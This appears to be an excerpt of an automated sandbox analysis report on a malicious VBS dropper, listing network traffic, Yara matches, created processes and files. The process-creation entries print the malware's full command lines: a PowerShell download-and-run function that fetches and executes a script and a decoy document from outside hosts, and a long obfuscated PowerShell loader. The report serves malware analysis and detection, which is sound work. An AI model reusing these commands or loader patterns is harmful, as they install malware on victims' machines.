                        Source: msiexec.exe, 00000013.00000002.2349092290.0000000006FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/d&F
                        Source: powershell.exe, 00000006.00000002.1959985428.000001D293BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1959985428.000001D294F7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2160894575.0000000004D15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/kp/Reissuer.xsn
                        Source: msiexec.exe, 00000013.00000002.2349092290.0000000006FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/r&4
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 103.53.42.63:443 -> 192.168.2.4:49739 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49754 version: TLS 1.2
                        Source: msiexec.exe, 00000013.00000003.2325408969.0000000022DE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_df6c9e43-a
                        Source: msiexec.exe, 00000013.00000003.2325408969.0000000022DE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_f1f88172-e
                        Source: Yara matchFile source: 20.3.svchost.exe.4b00000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.svchost.exe.4d20000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.3.msiexec.exe.23000000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.3.msiexec.exe.22de0000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.svchost.exe.4d20000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.3.msiexec.exe.23000000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000014.00000003.2336659742.0000000004D20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2325408969.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2326506772.0000000023000000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000003.2336254784.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7256, type: MEMORYSTR

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: amsi32_5568.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 7968, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Wscript starts Powershell (via cmd or directly)
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. ,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- R
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc'Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. ,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- RJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8AAB266_2_00007FFD9B8AAB26
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8AB8D26_2_00007FFD9B8AB8D2
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_04A2E6A811_2_04A2E6A8
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_04A2EF7811_2_04A2EF78
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_04A2E36011_2_04A2E360
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0783CC1011_2_0783CC10
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_2_04D794D020_2_04D794D0
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_2_04D8FC0220_2_04D8FC02
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_2_04D8D5A920_2_04D8D5A9
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_2_04D8866020_2_04D88660
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_2_04D8CF7E20_2_04D8CF7E
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_2_04D9104C20_2_04D9104C
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_2_04D791CA20_2_04D791CA
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_2_04D889ED20_2_04D889ED
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_2_04D8318B20_2_04D8318B
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_2_04D8D22920_2_04D8D229
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_2_04D8DB4520_2_04D8DB45
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4318
                        Source: unknownProcess created: Commandline size = 4318
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4318Jump to behavior
                        Source: amsi32_5568.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 7968, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@22/247@3/5
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\k9o5xs1hnem9ja8a.vbsJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
                        Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4b44c99e-e2eb-c0a4be-89a68ae4061c}
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eohnalwy.nkl.ps1Jump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7968
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5568
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: YinLHGpoX4.vbsReversingLabs: Detection: 13%
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. ,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- R
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. ,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- R
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Public\pqg5u7vt.doc" /o ""
